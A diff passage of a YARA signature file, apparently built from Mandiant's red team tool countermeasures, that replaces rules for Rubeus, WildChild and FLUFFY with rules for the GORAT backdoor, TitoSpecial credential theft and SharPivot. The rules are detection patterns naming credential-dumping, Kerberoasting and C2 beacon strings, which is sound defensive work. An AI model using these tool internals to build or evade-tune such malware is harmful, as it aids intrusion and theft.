"https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/CredTheft_MSIL_TitoSpecial_1.yar#L4-L27" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "6dc0780e54d33df733aadc8a89077232baa63bf1cbe47c5d164c57ce3185dd71" + hash = "4bf96a7040a683bd34c618431e571e26" + logic_hash = "4ac9a5ede4aea5d73545b459eb635f87ce08ba521afa48b76d2cfa94f1379226" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 1 + rev = 4 strings: - $typelibguid0 = "3f450977-d796-4016-bb78-c9e91c6a0f08" ascii nocase wide + $str1 = "Minidump" ascii wide + $str2 = "dumpType" ascii wide + $str3 = "WriteProcessMemory" ascii wide + $str4 = "bInheritHandle" ascii wide + $str5 = "GetProcessById" ascii wide + $str6 = "SafeHandle" ascii wide + $str7 = "BeginInvoke" ascii wide + $str8 = "EndInvoke" ascii wide + $str9 = "ConsoleApplication1" ascii wide + $str10 = "getOSInfo" ascii wide + $str11 = "OpenProcess" ascii wide + $str12 = "LoadLibrary" ascii wide + $str13 = "GetProcAddress" ascii wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of ($str*) } -rule FIREEYE_RT_Hacktool_MSIL_Rubeus_1 : FILE +rule FIREEYE_RT_APT_Backdoor_Win_GORAT_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public Rubeus project." + description = "This detects if a sample is less than 50KB and has a number of strings found in the Gorat shellcode (stage0 loader). The loader contains an embedded DLL (stage0.dll) that contains a number of unique strings. The 'Cookie' string found in this loader is important as this cookie is needed by the C2 server to download the Gorat implant (stage1 payload)." author = "FireEye" - id = "0ca140ea-2b9f-5904-a4c0-8615229626f0" + id = "5ac84cf1-49fb-533d-b211-b1a92239063b" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/RUBEUS/production/yara/HackTool_MSIL_Rubeus_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_1.yar#L4-L23" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "66e0681a500c726ed52e5ea9423d2654" - logic_hash = "ad954f9922ab564d68cb4515b080f6ee69476a8d87f0038e2ae4c222f0e182d7" + hash = "66cdaa156e4d372cfa3dea0137850d20" + logic_hash = "f6a0a923f64375e7ffdc080aec41db19a9e162405f1290ed0bbcce5a342bdadb" score = 75 - quality = 73 + quality = 75 tags = "FILE" rev = 4 strings: - $typelibguid = "658C8B7F-3664-4A95-9572-A3E5871DFC06" ascii nocase wide + $s1 = "httpComms.dll" ascii wide + $s2 = "Cookie: SID1=%s" ascii wide + $s3 = "Global\\" ascii wide + $s4 = "stage0.dll" ascii wide + $s5 = "runCommand" ascii wide + $s6 = "getData" ascii wide + $s7 = "initialize" ascii wide + $s8 = "Windows NT %d.%d;" ascii wide + $s9 = "!This program cannot be run in DOS mode." ascii wide condition: - uint16(0)==0x5A4D and $typelibguid + filesize <50KB and all of them } -rule FIREEYE_RT_Loader_MSIL_Wmirunner_1 : FILE +rule FIREEYE_RT_APT_Backdoor_Macos_GORAT_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMIRunner' project." + description = "This rule is looking for specific strings associated with network activity found within the MacOS generated variant of GORAT" author = "FireEye" - id = "04c6acfc-859f-5e4a-8c59-9adf08f21657" + id = "4646eadb-7acf-582f-9ad6-00f012ceed8a" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMIRUNNER/production/yara/Loader_MSIL_WMIRunner_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_MacOS_GORAT_1.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "49d21756a4f0b29909c4b0fa9f3a98dd0480f9401923032de4b3920814b85f29" + hash = "68acf11f5e456744262ff31beae58526" + logic_hash = "2df5f87d44968670511880d21ad184779d0561c7c426a5d6426bcefd0904a9b7" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 1 + rev = 3 strings: - $typelibguid0 = "6cc61995-9fd5-4649-b3cc-6f001d60ceda" ascii nocase wide + $s1 = "SID1=%s" ascii wide + $s2 = "http/http.dylib" ascii wide + $s3 = "Mozilla/" ascii wide + $s4 = "User-Agent" ascii wide + $s5 = "Cookie" ascii wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + (( uint32(0)==0xBEBAFECA) or ( uint32(0)==0xFEEDFACE) or ( uint32(0)==0xFEEDFACF) or ( uint32(0)==0xCEFAEDFE)) and all of them } -rule FIREEYE_RT_Dropper_HTA_Wildchild_1 : FILE +rule FIREEYE_RT_APT_Backdoor_Win_Gorat_Memory { meta: - description = "This rule looks for strings present in unobfuscated HTAs generated by the WildChild builder." + description = "Identifies GoRat malware in memory based on strings." author = "FireEye" - id = "f570baa5-7d58-5a0a-b713-769e62076f76" + id = "16fb1db7-711c-5d8d-9203-738c94f253fe" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/Dropper_HTA_WildChild_1.yar#L4-L24" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GoRat_Memory.yar#L4-L27" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "3e61ca5057633459e96897f79970a46d" - logic_hash = "60c1d53b8a43b9b7518f3260a4d61c6806641ee894a2a331a3a0a2ea0aff9d99" + hash = "3b926b5762e13ceec7ac3a61e85c93bb" + logic_hash = "88272e59325d106f96d6b6f1d57daf968823c1e760067dee0334c66c521ce8c2" score = 75 quality = 75 - tags = "FILE" - rev = 5 + tags = "" + rev = 1 strings: - $s1 = "processpath" ascii wide - $s2 = "v4.0.30319" ascii wide - $s3 = "v2.0.50727" ascii wide - $s4 = "COMPLUS_Version" ascii wide - $s5 = "FromBase64Transform" ascii wide - $s6 = "MemoryStream" ascii wide - $s7 = "entry_class" ascii wide - $s8 = "DynamicInvoke" ascii wide - $s9 = "Sendoff" ascii wide - $script_header = "<script language=" ascii wide + $murica = "murica" fullword + $rat1 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword + $rat2 = "rat.(*Core).generateBeacon" fullword + $rat3 = "rat.gJitter" fullword + $rat4 = "rat/comms.(*protectedChannel).SendCmdResponse" fullword + $rat5 = "rat/modules/filemgmt.(*acquire).NewCommandExecution" fullword + $rat6 = "rat/modules/latlisten.(*latlistensrv).handleCmd" fullword + $rat7 = "rat/modules/netsweeper.(*netsweeperRunner).runSweep" fullword + $rat8 = "rat/modules/netsweeper.(*Pinger).listen" fullword + $rat9 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword + $rat10 = "rat/platforms/win/dyloader.(*memoryLoader).ExecutePluginFunction" fullword + $rat11 = "rat/platforms/win/modules/namedpipe.(*dummy).Open" fullword + $winblows = "rat/platforms/win.(*winblows).GetStage" fullword condition: - $script_header at 0 and all of ($s*) + $winblows or #murica>10 or 3 of ($rat*) } -rule FIREEYE_RT_Loader_MSIL_Wildchild_1 : FILE +rule FIREEYE_RT_APT_Backdoor_Win_GORAT_2 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the WildChild project." + description = "Verifies that the sample is a Windows PE that is less than 10MB in size and has the Go build ID strings. Then checks for various strings known to be in the Gorat implant including strings used in C2 json, names of methods, and the unique string 'murica' used in C2 comms. A check is done to ensure the string 'rat' appears in the binary over 1000 times as it is the name of the project used by the implant and is present well over 2000 times." author = "FireEye" - id = "350dd658-46c9-573b-b532-07e4b437ba8d" + id = "e2c47711-d088-5cb4-8d21-f8199a865a28" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/Loader_MSIL_WildChild_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_2.yar#L4-L34" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "7e6bc0ed11c2532b2ae7060327457812" - logic_hash = "e4320e33770613542182518ec787e4ccbb32f83c8afca5ec957d4846e6f4eb04" + hash = "f59095f0ab15f26a1ead7eed8cdb4902" + logic_hash = "8efc904498386d89879766a5021148a250f639bc328df12a34cfc8d620df6f6c" score = 75 - quality = 73 + quality = 50 tags = "FILE" - rev = 4 + rev = 7 strings: - $typelibguid1 = "2e71d5ff-ece4-4006-9e98-37bb724a7780" ascii nocase wide + $go1 = "go.buildid" ascii wide + $go2 = "Go build ID:" ascii wide + $json1 = "json:\"pid\"" ascii wide + $json2 = "json:\"key\"" ascii wide + $json3 = "json:\"agent_time\"" ascii wide + $json4 = "json:\"rid\"" ascii wide + $json5 = "json:\"ports\"" ascii wide + $json6 = "json:\"agent_platform\"" ascii wide + $rat = "rat" ascii wide + $str1 = "handleCommand" ascii wide + $str2 = "sendBeacon" ascii wide + $str3 = "rat.AgentVersion" ascii wide + $str4 = "rat.Core" ascii wide + $str5 = "rat/log" ascii wide + $str6 = "rat/comms" ascii wide + $str7 = "rat/modules" ascii wide + $str8 = "murica" ascii wide + $str9 = "master secret" ascii wide + $str10 = "TaskID" ascii wide + $str11 = "rat.New" ascii wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 + uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and filesize <10MB and all of ($go*) and all of ($json*) and all of ($str*) and #rat>1000 } -rule FIREEYE_RT_APT_Loader_MSIL_WILDCHILD_1 : FILE +import "pe" + +rule FIREEYE_RT_APT_Backdoor_Win_GORAT_4 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "Verifies that the sample is a Windows PE that is less than 10MB in size and exports numerous functions that are known to be exported by the Gorat implant. This is done in an effort to provide detection for packed samples that may not have other strings but will need to replicate exports to maintain functionality." author = "FireEye" - id = "b9e0707e-98eb-55da-ad1d-6a84bd113747" - date = "2020-12-01" - date = "2020-12-01" - modified = "2020-12-09" + id = "fa3bcaad-c210-5b9c-8567-fe85b8e78055" + date = "2021-03-03" + modified = "2021-03-03" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/APT_Loader_MSIL_WILDCHILD_1.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_4.yar#L5-L16" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "6f04a93753ae3ae043203437832363c4" - logic_hash = "a600c3d127f77dc1f99160e4a242e005970de0abd1798296b6a351b968ca1350" + hash = "f59095f0ab15f26a1ead7eed8cdb4902" + logic_hash = "ec201614cb91fae9d7c89febfa22dfd6ba7f353e0eeb0b2fec6c8d887992e79e" score = 75 - quality = 75 + quality = 25 tags = "FILE" - rev = 1 + rev = 8 strings: - $s1 = "\x00QueueUserAPC\x00" - $s2 = "\x00WriteProcessMemory\x00" - $sb1 = { 6F [2] 00 0A 28 [2] 00 0A 6F [2] 00 0A 13 ?? 28 [2] 00 0A 28 [2] 00 0A 13 ?? 11 ?? 11 ?? 28 [2] 00 0A [0-16] 7B [2] 00 04 1? 20 [4] 28 [2] 00 0A 11 ?? 28 [2] 00 0A 28 [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 [0-16] 14 7E [2] 00 0A 7E [2] 00 0A 1? 20 04 00 08 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 [0-16] 7B [2] 00 04 7E [2] 00 0A [0-16] 8E ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 [4-120] 28 [2] 00 06 [0-80] 6F [2] 00 0A 6F [2] 00 0A 28 [2] 00 06 13 ?? 11 ?? 11 ?? 7E [2] 00 0A 28 [2] 00 06 } + $mz = "MZ" condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them + $mz at 0 and uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and filesize <10MB and pe.exports("MemoryCallEntryPoint") and pe.exports("MemoryDefaultAlloc") and pe.exports("MemoryDefaultFree") and pe.exports("MemoryDefaultFreeLibrary") and pe.exports("MemoryDefaultGetProcAddress") and pe.exports("MemoryDefaultLoadLibrary") and pe.exports("MemoryFindResource") and pe.exports("MemoryFindResourceEx") and pe.exports("MemoryFreeLibrary") and pe.exports("MemoryGetProcAddress") and pe.exports("MemoryLoadLibrary") and pe.exports("MemoryLoadLibraryEx") and pe.exports("MemoryLoadResource") and pe.exports("MemoryLoadString") and pe.exports("MemoryLoadStringEx") and pe.exports("MemorySizeofResource") and pe.exports("callback") and pe.exports("crosscall2") and pe.exports("crosscall_386") } -rule FIREEYE_RT_APT_Hacktool_MSIL_WMISPY_2 : FILE +rule FIREEYE_RT_APT_Backdoor_Win_GORAT_5 : FILE { meta: - description = "wql searches" + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "474af878-a657-54bc-a063-04532df928d4" - date = "2020-12-09" + id = "73102bd2-7b94-5c7b-b9a4-cfc9cf5e3212" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISPY/production/yara/APT_HackTool_MSIL_WMISPY_2.yar#L4-L24" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_5.yar#L4-L23" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "3651f252d53d2f46040652788499d65a" - logic_hash = "553fc1e536482a56b3228a5c9ebac843af9083e8ac864bf65c81b36a39ca5e5e" + hash = "cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f" + logic_hash = "67f85fb3bedfd18a1226c92318f387be3c7ff9566ca2d554c49cf62389482552" score = 75 quality = 75 tags = "FILE" - rev = 4 + rev = 1 strings: - $MSIL = "_CorExeMain" - $str1 = "root\\cimv2" wide - $str2 = "root\\standardcimv2" wide - $str3 = "from MSFT_NetNeighbor" wide - $str4 = "from Win32_NetworkLoginProfile" wide - $str5 = "from Win32_IP4RouteTable" wide - $str6 = "from Win32_DCOMApplication" wide - $str7 = "from Win32_SystemDriver" wide - $str8 = "from Win32_Share" wide - $str9 = "from Win32_Process" wide + $1 = "comms.BeaconData" fullword + $2 = "comms.CommandResponse" fullword + $3 = "rat.BaseChannel" fullword + $4 = "rat.Config" fullword + $5 = "rat.Core" fullword + $6 = "platforms.AgentPlatform" fullword + $7 = "GetHostID" fullword + $8 = "/rat/cmd/gorat_shared/dllmain.go" fullword condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and $MSIL and all of ($str*) + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Hacktool_MSIL_Wmispy_1 : FILE +rule FIREEYE_RT_Trojan_MSIL_GORAT_Plugin_DOTNET_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMIspy' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'RedFlare - Plugin - .NET' project." author = "FireEye" - id = "ac394751-da40-564b-8e24-8f353326b46a" + id = "faa73d64-4bb1-5c06-a3a5-1f1aa99ea932" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISPY/production/yara/HackTool_MSIL_WMIspy_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/Trojan_MSIL_GORAT_Plugin_DOTNET_1.yar#L4-L16" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "a5a9f7c7a7bfe474e8b21306ea220b4d476832f3ad4fafdd8967a2250d15a701" + logic_hash = "e979822273c6d1ccdfebd341c9e2cb1040fe34a04e8b41c024885063fd946ad5" score = 75 - quality = 73 + quality = 71 tags = "FILE" rev = 1 strings: - $typelibguid0 = "5ee2bca3-01ad-489b-ab1b-bda7962e06bb" ascii nocase wide + $typelibguid0 = "cd9407d0-fc8d-41ed-832d-da94daa3e064" ascii nocase wide + $typelibguid1 = "fc3daedf-1d01-4490-8032-b978079d8c2d" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Hacktool_MSIL_GETDOMAINPASSWORDPOLICY_1 : FILE +rule FIREEYE_RT_Trojan_MSIL_GORAT_Module_Powershell_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the recon utility 'getdomainpasswordpolicy' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'RedFlare - Module - PowerShell' project." author = "FireEye" - id = "69745e99-33cc-5171-ae7a-5c98439a0b6d" + id = "b0fba130-9cd9-5b7f-a806-9ff8099f5731" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/GETDOMAINPASSWORDPOLICY/production/yara/HackTool_MSIL_GETDOMAINPASSWORDPOLICY_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/Trojan_MSIL_GORAT_Module_PowerShell_1.yar#L4-L16" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "6b2ea3ebfea2c87f16052f4a43b64eb2d595c2dd4a64d45dfce1642668dcf602" + logic_hash = "e596bc0316a4ef85f04c2683ebc7c94bf9b831843232c33e62c84991e4caeb97" score = 75 - quality = 73 + quality = 71 tags = "FILE" - rev = 4 + rev = 1 strings: - $typelibguid0 = "a5da1897-29aa-45f4-a924-561804276f08" ascii nocase wide + $typelibguid0 = "38d89034-2dd9-4367-8a6e-5409827a243a" ascii nocase wide + $typelibguid1 = "845ee9dc-97c9-4c48-834e-dc31ee007c25" ascii nocase wide condition: - filesize <10MB and ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_FLUFFY_2 : FILE +rule FIREEYE_RT_APT_Backdoor_Win_GORAT_3 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "This rule uses the same logic as FE_APT_Trojan_Win_GORAT_1_FEBeta with the addition of one check, to look for strings that are known to be in the Gorat implant when a certain cleaning script is not run against it." author = "FireEye" - id = "ce39710e-7649-5f7d-bbbe-65dc30f678e8" - date = "2020-12-04" - date = "2020-12-04" + id = "94c195b5-b8e8-56a7-bc11-dbbe2f969b06" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/FLUFFY/production/yara/APT_HackTool_MSIL_FLUFFY_2.yar#L4-L21" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_3.yar#L4-L39" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "11b5aceb428c3e8c61ed24a8ca50553e" - logic_hash = "872ab717668375a49d6c7b1927a680747b405c0198fe4fc6f43ccc562870eb37" + hash = "995120b35db9d2f36d7d0ae0bfc9c10d" + logic_hash = "592745e9c67f7adf0cd48975ed1497211d8efeff29b52be1e2d082b9a648bb57" score = 75 - quality = 75 + quality = 28 tags = "FILE" - rev = 1 + rev = 5 strings: - $s1 = "\x00Asktgt\x00" - $s2 = "\x00Kerberoast\x00" - $s3 = "\x00HarvestCommand\x00" - $s4 = "\x00EnumerateTickets\x00" - $s5 = "[*] Action: " wide - $s6 = "\x00Fluffy.Commands\x00" + $dirty1 = "fireeye" ascii nocase wide + $dirty2 = "kulinacs" ascii nocase wide + $dirty3 = "RedFlare" ascii nocase wide + $dirty4 = "gorat" ascii nocase wide + $dirty5 = "flare" ascii nocase wide + $go1 = "go.buildid" ascii wide + $go2 = "Go build ID:" ascii wide + $json1 = "json:\"pid\"" ascii wide + $json2 = "json:\"key\"" ascii wide + $json3 = "json:\"agent_time\"" ascii wide + $json4 = "json:\"rid\"" ascii wide + $json5 = "json:\"ports\"" ascii wide + $json6 = "json:\"agent_platform\"" ascii wide + $rat = "rat" ascii wide + $str1 = "handleCommand" ascii wide + $str2 = "sendBeacon" ascii wide + $str3 = "rat.AgentVersion" ascii wide + $str4 = "rat.Core" ascii wide + $str5 = "rat/log" ascii wide + $str6 = "rat/comms" ascii wide + $str7 = "rat/modules" ascii wide + $str8 = "murica" ascii wide + $str9 = "master secret" ascii wide + $str10 = "TaskID" ascii wide + $str11 = "rat.New" ascii wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them + uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and filesize <10MB and all of ($go*) and all of ($json*) and all of ($str*) and #rat>1000 and any of ($dirty*) } -rule FIREEYE_RT_APT_Hacktool_MSIL_FLUFFY_1 : FILE +rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_3 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "This rule looks for .NET PE files that have the strings of various method names in the SharPivot code." author = "FireEye" - id = "6593202d-9b30-59ed-98c0-3e730fb5ceb7" - date = "2020-12-04" - date = "2020-12-04" - modified = "2020-12-09" + id = "616333fc-4075-5f04-823a-1164717a2b87" + date = "2020-12-10" + modified = "2020-12-10" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/FLUFFY/production/yara/APT_HackTool_MSIL_FLUFFY_1.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_3.yar#L4-L31" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "11b5aceb428c3e8c61ed24a8ca50553e" - logic_hash = "4d91c96ab7b628e88f79ee193612acc959448fe2220ef54371f5f5c6e7305d86" + hash = "e4efa759d425e2f26fbc29943a30f5bd" + logic_hash = "ecf13e47e409efd68b508735a84be6a1627f5b0c0cea6b90434fc9ba5b1d8cf5" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 3 strings: - $sb1 = { 0E ?? 1? 72 [4] 28 [2] 00 06 [0-16] 28 [2] 00 0A [2-80] 1F 58 0? [0-32] 28 [2] 00 06 [2-32] 1? 28 [2] 00 06 0? 0? 6F [2] 00 06 [2-4] 1F 0B } - $sb2 = { 73 [2] 00 06 13 ?? 11 ?? 11 ?? 7D [2] 00 04 11 ?? 73 [2] 00 0A 7D [2] 00 04 0E ?? 2D ?? 11 ?? 7B [2] 00 04 72 [4] 28 [2] 00 0A [2-32] 0? 28 [2] 00 0A [2-16] 11 ?? 7B [2] 00 04 0? 28 [2] 00 0A 1? 28 [2] 00 0A [2-32] 7E [2] 00 0A [0-32] FE 15 [2] 00 02 [0-16] 7D [2] 00 04 28 [2] 00 06 [2-32] 7B [2] 00 04 7D [2] 00 04 [2-32] 7C [2] 00 04 FE 15 [2] 00 02 [0-16] 11 ?? 8C [2] 00 02 28 [2] 00 0A 28 [2] 00 0A [2-80] 8C [2] 00 02 28 [2] 00 0A 12 ?? 12 ?? 12 ?? 28 [2] 00 06 } - $ss1 = "\x00Fluffy\x00" + $msil = "_CorExeMain" ascii wide + $str1 = "SharPivot" ascii wide + $str2 = "ParseArgs" ascii wide + $str3 = "GenRandomString" ascii wide + $str4 = "ScheduledTaskExists" ascii wide + $str5 = "ServiceExists" ascii wide + $str6 = "lpPassword" ascii wide + $str7 = "execute" ascii wide + $str8 = "WinRM" ascii wide + $str9 = "SchtaskMod" ascii wide + $str10 = "PoisonHandler" ascii wide + $str11 = "SCShell" ascii wide + $str12 = "SchtaskMod" ascii wide + $str13 = "ServiceHijack" ascii wide + $str14 = "commandArg" ascii wide + $str15 = "payloadPath" ascii wide + $str16 = "Schtask" ascii wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $msil and all of ($str*) } rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_1 : FILE { @@ -125557,46 +127862,6 @@ rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_2 : FILE condition: ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_3 : FILE -{ - meta: - description = "This rule looks for .NET PE files that have the strings of various method names in the SharPivot code." - author = "FireEye" - id = "616333fc-4075-5f04-823a-1164717a2b87" - date = "2020-12-10" - modified = "2020-12-10" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_3.yar#L4-L31" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "e4efa759d425e2f26fbc29943a30f5bd" - logic_hash = "ecf13e47e409efd68b508735a84be6a1627f5b0c0cea6b90434fc9ba5b1d8cf5" - score = 75 - quality = 75 - tags = "FILE" - rev = 3 - - strings: - $msil = "_CorExeMain" ascii wide - $str1 = "SharPivot" ascii wide - $str2 = "ParseArgs" ascii wide - $str3 = "GenRandomString" ascii wide - $str4 = "ScheduledTaskExists" ascii wide - $str5 = "ServiceExists" ascii wide - $str6 = "lpPassword" ascii wide - $str7 